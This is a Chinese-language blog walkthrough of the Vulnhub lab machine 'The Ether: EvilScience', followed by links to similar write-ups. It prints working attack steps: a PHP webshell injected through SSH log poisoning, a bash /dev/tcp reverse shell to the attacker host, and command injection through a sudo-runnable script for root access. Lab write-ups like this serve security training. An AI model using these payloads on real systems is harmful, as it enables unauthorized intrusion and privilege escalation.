Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE

最新推荐文章于 2024-11-30 15:57:46 发布
原创 最新推荐文章于 2024-11-30 15:57:46 发布 · 795 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透学习 #vulnhub

文章详细描述了一次针对ApacheHTTPD服务器的漏洞利用过程,包括环境配置、端口扫描、发现换行解析漏洞并利用LFI字典找到SSH日志,通过SSH错误日志写入一句话木马。接着,作者通过`sudo-l`发现可以root权限运行的py文件,实现提权,并获取flag。整个过程展示了网络安全测试的基本步骤和技术。

环境搭建

环境下载

靶机和攻击机网络适配都选 NAT 即可。

信息收集

主机扫描
在这里插入图片描述
两个端口,22 和 80,且 apache httpd 2.4.0~2.4.29 存在换行解析漏洞。

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
来自:https://vulhub.org/#/environments/httpd/CVE-2017-15715/

在这里插入图片描述
测了半天,除了一个文件包含,也没发现特别的东西,看了大佬的 wp ,用 seclists 字典中的 LFI 字典跑一下。

就可以发现一个特殊的文件,ssh 的日志,
在这里插入图片描述

getshell

ssh 连接一下靶机,curl ip/var/log/auth.log,ssh 日志已经写入。
在这里插入图片描述
这边利用 ssh 登录产生错误日志写入一句话木马。
在这里插入图片描述

访问执行命令。
在这里插入图片描述
这反弹有点迷,这样就能弹出来,直接 bash … 弹不出来。

echo "bash -i >& /dev/tcp/192.168.29.129/9999 0>&1"|bash

在这里插入图片描述
有个 py 文件,cat 了下,直接卡主,还是在页面上看吧,里面是一堆加密后的代码。

在这里插入图片描述

提权

sudo -l 发现 xxxlogauditorxxx.py 可以以 root 运行。

在这里插入图片描述
先开个终端

python -c 'import pty;pty.spawn("/bin/bash");'

然后如下,就可以以 root 权限运行。

sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

在这里插入图片描述

flag

复制 root 目录下的 flag 到网站中,下载下来,解码。

/var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png

在这里插入图片描述

wp

https://blog.youkuaiyun.com/weixin_34220834/article/details/88772835

总结

本地文件包含:利用 ssh 登录产生错误日志写入一句话木马
(ssh '<?php eval($_GET[1]);?>'@ip)
seclists 字典:https://github.com/danielmiessler/SecLists
sudo -l
vulnhub靶机渗透 theEther
RestoreJustice的博客
03-19 351
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。获取webshell。之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行。
The Ether: Evil Science靶机渗透测试
weixin_58786230的博客
08-08 534
【代码】The Ether: Evil Science靶机渗透测试。
The Ether: EvilScience VM靶机打靶记录
qq_64703089的博客
10-09 959
The Ether: EvilScience VM靶机
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
我是小小白的博客
07-09 871
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip 靶机难度:中级(CTF) 靶机发布日期:2017 年 10 月 30 日 靶机描述:最近,我一直喜欢为安全社区创造黑客挑战。这一新挑战囊括了一家名为 The Ether 的公司,该公司宣布了一种显着改变人类福利的灵丹妙药。由于他们正在开发的产品的性质,CDC 对这个群体产生了怀疑。 目标:
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1647
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
Vulnhub靶机:The Ether: EvilScience
whoami
09-25 1144
Vulnhub靶机:The Ether: EvilScience实战
The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升)
网安学习
08-06 717
The Ether: EvilScience (v1.0.1)打靶渗透【附代码】(权限提升) 【文件包含的错误日志利用】
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
Vulnhub-theEther
m0_52016680的博客
11-09 1126
Vulnhub类OSCP靶机
vulnhubThe Ether: Evil Science靶机
wbplife的博客
08-02 429
发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马,点击各处之后,发下在点击上面的ABOUT US之后,url里有着请求参数:/index.php?利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令。对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破。拼接目录扫描出的目录,没有什么有用的信息,
Vulnhub靶机 The Ether: EvilScience (v1.0.1)渗透测试详解)
2301_78721909的博客
08-03 479
Vulnhub靶机 The Ether: EvilScience (v1.0.1) 渗透测试拿shell
靶机渗透(十二)evilscience
qq_42180996的博客
05-23 1948
靶机evilscience 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) 4.网站指纹信息扫描(whatweb) (二)Web渗透 1.浏览web网页(80端口) 2.目录扫描(dirb) 3.文件包含漏洞利用 >另一种执行ls命令的方法 4...
Vulnhub靶场渗透-theEther
paidx0
10-03 1396
前言 这次的靶机还是很好玩的,有点难度折腾了挺久,但方法对了那就很容易了 靶机ip(192.168.110.129) 攻击机ip(192.168.110.127) 网络NAT模式 不废话了直接开始 信息收集 打开网页简单看了看,没有过多的内容,是个基因的论文网站 网站没有太多的功能,而且扫目录也没扫到什么有价值的东西 最开始以为网站上的这些单词可能会用到,就利用他们做了个字典去爆破 ssh,显然我的方法就是错的 漏洞挖掘 注意到这个位置很有可能是利用存在读文件,简单尝试了几次Apache的日志文件
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1342
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
Evilscience靶机渗透实战-vulnhub系列()
PANDA墨森的博客
07-04 670
这是vulnhub靶机系列文章的第五篇,本次的靶机主要学习到的漏洞利用为文件包含漏洞,话不多说,直接开始吧... 靶机下载地址:https://www.vulnhub.com/entry/the-ether-evilscience,212 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13195877.html #001 环境搭建(nat) 攻击机kali:192168.136.129 靶机evilscience:192.168.136.143 ..
渗透测试(三)- evilscience靶机
最新发布
weixin_72060499的博客
11-30 1141
使用sudo权限不需要密码执行xxxlogauditorxxx.py,查看py文件的内容发现里边有很大一部分内容使用了base64编码;将xxxlogauditorxxx.py拷贝网网站目录下,使用wget下载查看py文件的内容。访问一下80端口发现顶部有几个链接,点击发现是通过传参方式显示了页面,看到“index.php?查看是否属于sudo组,发现可以使用sudo权限,且不需要密码执行xxxlogauditorxxx.py文件。拼接/var/log/auth.log,有返回。探测目标靶机IP地址。
kali渗透综合靶机(十六)--evilscience靶机
W小哥
04-02 1317
https://download.vulnhub.com/theether/theEther_1.0.1.zip
evilscience靶机复现
weixin_52956666的博客
08-02 276
因为只开放了ssh和http,尝试查看ssh日志。靶机IP为 192.168.112.150。靶机设置为NAT模式。发现存在文件包含漏洞。
VulnHub渗透测试入门靶场 - THE ETHER: EVILSCIENCE
2401_83378606的博客
09-27 1291
那么怎么上传呢,刚刚我们包含了一个使用eval函数get传参的一句话木马,并且在kali上起了一个简单的http服务,既然有eval函数,那我们可以利用system()函数执行系统命令,去下载msf生成的木马。想想开放了22ssh端口,结合文件包含,可以进行向本地ssh日志中写shell,然后本地文件包含ssh的日志文件即可getshell。这俩个地方,看看url都是被包含的文件,看看有没有文件包含漏洞。木马有了,现在就是上传到目标靶机,然后执行在msf上线即可。发现有我们的探针文件,那就直接蚁剑连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值